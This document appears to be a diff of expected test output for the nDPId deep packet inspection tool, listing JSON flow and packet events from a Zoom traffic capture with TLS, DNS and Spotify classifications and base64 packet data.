+00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01222{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 
00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569520470350,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520470350,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjK4AAAAQEICiWc3wRwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470666,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1569520470666,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520470666,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABI4PAAAEARFPDAqAF1wKgB\/+EV4RUANLyaU3BvdFVkcDAJFTOWktM6lAABAARIlcIDDi3QR5gZLZgtSkZtNr91y8rdz4k="} 
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470666,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470666,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470741,"flow_last_seen":1569520470741,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520470741,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1569520470741,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470741,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAOwQAAP8R\/OHAqAF1wKgBAfRjADUALIWIr1EBAAABAAAAAAAACnpvb21mcjg1emMEem9vbQJ1cwAAAQAB"} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470741,"flow_last_seen":1569520470741,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520470741,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr85zc.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470741,"flow_last_seen":1569520470741,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520470741,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": 
{"query":"zoomfr85zc.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1569520470742,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470742,"pkt":"EBMx8Tl2KDc3AG3ICABFAABALr4AAP8RCSjAqAF1wKgBAeLPADUALAFaRhQBAAABAAAAAAAACnpvb21mcjg0emMEem9vbQJ1cwAAAQAB"} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr84zc.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr84zc.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1569520470742,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470742,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGEx7AqAF11ROQadZTAbug3l1NAAAAALAC\/\/8zBgAAAgQFtAEDAwUBAQgKJZzghQAAAAAEAgAA"} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470755,"flow_last_seen":1569520470755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470755,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1569520470755,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470755,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGEx\/AqAF11ROQaNZUAbsLvInbAAAAALAC\/\/+bjgAAAgQFtAEDAwUBAQgKJZzgkQAAAAAEAgAA"} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1569520470768,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1569520470768,"pkt":"KDc3AG3IEBMx8Tl2CABFAABQFgoAADcR6czAqAEBwKgBdQA19GMAPOFdr1GBgAABAAEAAAAACnpvb21mcjg1emMEem9vbQJ1cwAAAQABwAwAAQABAAABLAAE1fSMVQ=="} 
-00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520470741,"flow_last_seen":1569520470768,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470768,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr85zc.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"213.244.140.85"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520470741,"flow_last_seen":1569520470768,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470768,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr85zc.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"213.244.140.85"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470769,"flow_last_seen":1569520470769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470769,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1569520470769,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470769,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFlHAqAF11fSMVdZVAbvq+zZHAAAAALAC\/\/8TBgAAAgQFtAEDAwUBAQgKJZzgnwAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1569520470775,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470775,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGIyLVE5BpwKgBdQG71lPrn+6AoN5dTqASqbAo0wAAAgQFrAQCCAp4fR7ZJZzghQEDAww="} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1569520470775,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470775,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGEyrAqAF11ROQadZTAbug3l1O65\/ugYAQECzxAQAAAQEICiWc4KR4fR7Z"} -00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470742,"flow_last_seen":1569520470775,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470775,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470742,"flow_last_seen":1569520470775,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470775,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1569520470776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1569520470776,"pkt":"KDc3AG3IEBMx8Tl2CABFAABQ61QAADcRFILAqAEBwKgBdQA14s8APF0wRhSBgAABAAEAAAAACnpvb21mcjg0emMEem9vbQJ1cwAAAQABwAwAAQABAAABLAAE1fSMVA=="} 
-00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":168,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520470742,"flow_last_seen":1569520470776,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470776,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr84zc.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"213.244.140.84"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":168,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520470742,"flow_last_seen":1569520470776,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470776,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr84zc.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"213.244.140.84"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470776,"flow_last_seen":1569520470776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470776,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1569520470776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470776,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFlLAqAF11fSMVNZWAbv57BLmAAAAALAC\/\/8ncAAAAgQFtAEDAwUBAQgKJZzgpQAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1569520470787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470787,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGIyPVE5BowKgBdQG71lTDwlhoC7yJ3KASqbBbBgAAAgQFrAQCCAp7WhBHJZzgkQEDAww="} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1569520470787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470787,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGEyvAqAF11ROQaNZUAbsLvIncw8JYaYAQECwjNgAAAQEICiWc4K97WhBH"} -00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470755,"flow_last_seen":1569520470787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470787,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470755,"flow_last_seen":1569520470787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470787,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1569520470790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470790,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGI1XV9IxVwKgBdQG71lXIKlM86vs2SKASqbDi9AAAAgQFrAQCCAp4gwNrJZzgnwEDAww="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1569520470790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470790,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFl3AqAF11fSMVdZVAbvq+zZIyCpTPYAQECyrLwAAAQEICiWc4LJ4gwNr"} 
